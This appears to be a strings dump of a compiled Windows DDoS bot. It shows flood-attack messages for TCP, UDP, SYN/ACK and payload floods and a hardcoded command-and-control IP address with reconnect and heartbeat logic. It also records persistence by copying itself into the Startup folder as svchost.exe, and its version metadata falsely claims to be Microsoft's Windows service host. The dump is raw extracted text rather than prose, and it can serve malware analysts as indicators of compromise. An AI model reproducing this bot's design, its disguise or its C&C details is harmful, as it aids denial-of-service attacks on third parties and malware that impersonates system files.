!This program cannot be run in DOS mode.
`.data
.rdata
@.pdata
@.xdata
.idata
.reloc
AUATUWVSH
[^_]A\A]
[^_]A\A]
AUATUWVSH
[^_]A\A]
AWAVAUATUWVSH
[^_]A\A]A^A_
UAWAVAUATWVSH
[^_A\A]A^A_]
AWAVAUATUWVSH
H+D$0H9
[^_]A\A]A^A_
AWAVAUATUWVSH
8[^_]A\A]A^A_
8[^_]A\A]A^A_
AWAVAUATUWVSH
[^_]A\A]A^A_
AWAVAUATUWVSH
[^_]A\A]A^A_
AWAVAUATUWVSH
D$<A9\$
t$XI+1t
h[^_]A\A]A^A_
AWAVAUATUWVSH
H+D$0H9
|$hI+8t
x[^_]A\A]A^A_
AWAVAUATUWVSH
H+D$0L9
|$hI+9t
x[^_]A\A]A^A_
AWAVAUATUWVSH
[^_]A\A]A^A_
AWAVAUATUWVSH
[^_]A\A]A^A_
AWAVAUATUWVSH
[^_]A\A]A^A_
AWAVAUATUWVSH
[^_]A\A]A^A_
AVAUATVSH
P[^A\A]A^
AWAVAUATUWVSH
\$\D9\$h
HcD$LE
[^_]A\A]A^A_
AWAVAUATUWVSH
[^_]A\A]A^A_
AUATWVSH
[^_A\A]
AUATVSH
[^A\A]
AUATWVSH
[^_A\A]
UAVAUATWVSH
ATUWVSH
P[^_]A\
P[^_]A\
UAWAVAUATWVSH
[^_A\A]A^A_]
ATWVSH
([^_A\H
tNHcA<H
tTIcB<L
tCHcA<H
tKIcA<L
tSIcK<L
AUATSH
0[A\A]
C$9C(~
u HcC$A
AVAUATUWVSH
@[^_]A\A]A^
UATWVSH
tmIcD$
[^_A\]
[^_A\]
=UUUUw
UAWAVAUATWVSH
[^_A\A]A^A_]
AUATSH
[A\A]
UAWAVAUATWVSH
[^_A\A]A^A_]
AUATUWVSH
h[^_]A\A]
h[^_]A\A]
AWAVAUATUWVSH
[^_]A\A]A^A_
AWAVAUATUWVSH
8[^_]A\A]A^A_
AWAVAUATUWVSH
[^_]A\A]A^A_
D$(9D$|
HcD$PH
L$|;L$(
+T$TE1
D$D+D$(
ATUWVSHcY
[^_]A\
[^_]A\
AUATVSH
([^A\A]
AWAVAUATUWVSH
([^_]A\A]A^A_
AUATWVSH
[^_A\A]
[^_A\A]
AVAUATUWVSH
[^_]A\A]A^
AUATUWVSH
([^_]A\A]
([^_]A\A]
ATSHcA
AUATWVSH
@[^_A\A]
AVAUATUWVSH
@[^_]A\A]A^
ATWVSH
H[^_A\
AVAUATUWVSH
0[^_]A\A]A^
AUATUWVSH
[^_]A\A]
333333
Starting optimized TCP attack on %s:%d with %d threads for %d seconds
Memory allocation failed
Failed to allocate memory for thread %d
Failed to create thread %d
TCP attack on %s:%d completed
Failed to create thread %d
Port %d is already in use by another process (bind check)
Port %d is already in use by another process (TCP table check)
Received signal %d, preparing for shutdown...
WSAStartup failed with error: %d
Could not find a usable version of Winsock.dll
Winsock initialized successfully
Closing client socket
Winsock cleaned up
Cleaning up resources...
Releasing mutex
Bot shutdown complete, all resources released.
%d.%d.%d.%d
Port %d is already in use. Not launching TCP attack.
Port %d is already in use. Not launching UDP attack.
Port %d is already in use. Not launching PPS attack.
Port %d is already in use. Not launching NUDP attack.
Port %d is already in use. Not launching UDP Payload attack.
Port %d is already in use. Not launching TCP Payload attack.
synack
acksyn
synrst
ackpsh
finack
Invalid socket passed to connect_with_timeout
Failed to set socket to non-blocking mode: %d
Connect failed immediately with error: %d
Connection attempt timed out
Select failed during connect: %d
Connection failed with error: %d
Socket is not writable after select
Failed to set socket back to blocking mode: %d
RtlGetVersion
Windows %lu.%lu (Bot build %.1f)
Unknown (Bot build %.1f)
CBOTX_INSTANCE_MUTEX_1_7
Another bot instance is already running. Exiting...
Another bot is already using port %d. Shutting down...
123.253.61.24
Failed to create socket. Waiting before retry...
Attempting to connect to CNC server at %s:%d
Connection failed. Retrying in 3 seconds...
Connected to C&C server
recv failed
Server closed connection
Received %d bytes:
Heartbeat failed, server unavailable
Select error: %d
Disconnected from server. Retrying in 3 seconds...
Main loop exited, performing cleanup...
File deleted successfully: %s
Error deleting file: %s. Error code: %d
svchost.exe
File %s deleted from Startup.
Error: Failed to delete file %s from Startup. Error code: %d
Error: Could not get Startup folder path.
Old file with the same name deleted successfully.
Error while deleting old file: %d
File renamed successfully to: %s
Error while renaming file: %d
File does not exist in Startup to rename.
File copied to Startup successfully.
Error while copying file: %d
File already exists in Startup.
CONOUT$
*** stack smashing detected ***:
*** buffer overflow detected ***:
terminated
Unknown error
Argument domain error (DOMAIN)
Overflow range error (OVERFLOW)
Partial loss of significance (PLOSS)
Total loss of significance (TLOSS)
The result is too small to be represented (UNDERFLOW)
Argument singularity (SIGN)
_matherr(): %s in %s(%g, %g) (retval=%g)
Mingw-w64 runtime failure:
Address %p has no image-section
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
(null)
Infinity
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 10-win32 20220113
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 9.3-win32 20200320
GCC: (GNU) 10-win32 20220113
CryptAcquireContextA
CryptGenRandom
CryptReleaseContext
GetTcpTable
CloseHandle
CopyFileA
CreateMutexA
CreateThread
DeleteCriticalSection
DeleteFileA
EnterCriticalSection
ExitProcess
GetCurrentProcessId
GetLastError
GetModuleFileNameA
GetModuleHandleW
GetProcAddress
GetStartupInfoA
InitializeCriticalSection
IsDBCSLeadByteEx
LeaveCriticalSection
MoveFileA
MultiByteToWideChar
ReleaseMutex
SetThreadPriority
SetUnhandledExceptionFilter
TlsGetValue
VirtualProtect
VirtualQuery
WaitForMultipleObjects
WideCharToMultiByte
__C_specific_handler
___lc_codepage_func
___mb_cur_max_func
__getmainargs
__initenv
__iob_func
__lconv_init
__set_app_type
__setusermatherr
_acmdln
_amsg_exit
_cexit
_commode
_errno
_fmode
_initterm
_onexit
_time64
_unlock
calloc
fclose
fprintf
fwrite
localeconv
malloc
memcpy
perror
signal
strcpy
strerror
strlen
strncmp
strrchr
strstr
vfprintf
wcslen
_write
_close
SHGetSpecialFolderPathA
WSACleanup
WSAGetLastError
WSASetLastError
WSASocketA
WSAStartup
__WSAFDIsSet
closesocket
connect
getsockopt
inet_addr
ioctlsocket
select
sendto
setsockopt
shutdown
socket
ADVAPI32.dll
IPHLPAPI.DLL
KERNEL32.dll
msvcrt.dll
SHELL32.dll
WS2_32.dll
ntdll.dll
(null)
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Host Process for Windows Services
FileVersion
1.2.0.0
InternalName
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
svchost.exe
ProductName
Microsoft
Windows
Operating System
ProductVersion
1.2.0.0
VarFileInfo
Translation